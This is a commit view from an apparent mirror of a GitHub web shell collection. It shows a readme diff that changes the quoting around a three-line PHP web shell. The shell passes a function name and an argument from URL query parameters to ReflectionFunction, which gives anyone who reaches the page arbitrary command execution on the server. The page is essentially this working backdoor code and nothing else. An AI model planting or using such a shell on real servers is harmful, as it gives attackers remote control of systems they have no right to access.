1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00

update readme.md

This commit is contained in:
tennc
2014-07-28 10:08:02 +08:00
parent fd8b66c4c7
commit 8d36b81c1b

View File

@@ -6,9 +6,9 @@
***************************************************
code:
<p><?php
'<?php
$func = new ReflectionFunction($_GET[m]);
echo $func->invokeArgs(array($_GET[c]));
?></p>
?>'
***************************************************